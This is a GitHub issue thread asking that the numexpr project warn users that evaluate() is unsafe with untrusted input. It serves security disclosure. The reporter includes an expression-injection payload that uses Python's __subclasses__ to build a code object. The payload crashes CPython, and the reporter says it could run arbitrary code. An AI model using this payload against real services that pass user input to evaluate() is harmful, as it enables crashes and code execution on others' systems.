Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Document that it's not safe to use evaluate() with user inputs #323

Closed
Dobatymo opened this issue Oct 17, 2018 · 2 comments
Closed

Document that it's not safe to use evaluate() with user inputs #323

Dobatymo opened this issue Oct 17, 2018 · 2 comments

Comments

@Dobatymo
Copy link

Dobatymo commented Oct 17, 2018
edited
Loading

This crashes CPython (v3.6.6)

import numexpr

s = """
(lambda fc=(
    lambda n: [
        c for c in 
            ().__class__.__bases__[0].__subclasses__() 
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
    )()
)()
"""
numexpr.evaluate(s)

see: https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html
@Dobatymo Dobatymo changed the title Document if evaluate is safe to use with arbitrary inputs Document that it's not safe to use evaluate with user inputs Oct 17, 2018
@robbmcleod
Copy link
Member

We don't call eval, we call compile. Your code fragment:

(lambda fc=(
    lambda n: [
        c for c in 
            ().__class__.__bases__[0].__subclasses__() 
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(0,0,0,0,0,b"a",(),(),(),"","",0,b""),{}
    )()
)()

crashes CPython, so probably you should report it as an upstream bug with CPython's compile function.

@Dobatymo
Copy link
Author

Dobatymo commented Oct 18, 2018
edited
Loading

The point is with this snippet I can execute arbitrary code...
I would only have to replace the b"a" part of the code call with valid code.
I just chose this invalid sequence as not have to generate a piece of valid code.

Also it's not the compilation which fails, but the execution, for which you do use eval: https://github.com/pydata/numexpr/blob/master/numexpr/necompiler.py#L299

See:

XXX lineno: 1, opcode: 32
Traceback (most recent call last):
  File "crash.py", line 19, in <module>
    numexpr.evaluate(s)
  File "numexpr\necompiler.py", line 816, in evaluate
    _names_cache[expr_key] = getExprNames(ex, context)
  File "numexpr\necompiler.py", line 707, in getExprNames
    ex = stringToExpression(text, {}, context)
  File "numexpr\necompiler.py", line 299, in stringToExpression
    ex = eval(c, names)
  File "<expr>", line 3, in <module>
  File "<expr>", line 10, in <lambda>
  File "<bad>", line 1, in <module>
SystemError: unknown opcode

when used with b" ".

@Dobatymo Dobatymo changed the title Document that it's not safe to use evaluate with user inputs Document that it's not safe to use evaluate() with user inputs Jan 2, 2019
@Dobatymo Dobatymo mentioned this issue Feb 22, 2024
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@robbmcleod @Dobatymo